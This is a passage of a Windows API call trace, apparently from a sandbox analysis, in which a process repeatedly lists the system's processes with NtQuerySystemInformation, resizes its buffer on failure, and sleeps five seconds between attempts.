BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.452] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.459] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.467] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.473] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.480] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.487] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.493] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.500] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.507] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.515] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.522] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.529] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.535] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.542] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.551] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.559] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.567] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.575] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.582] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.588] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.596] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 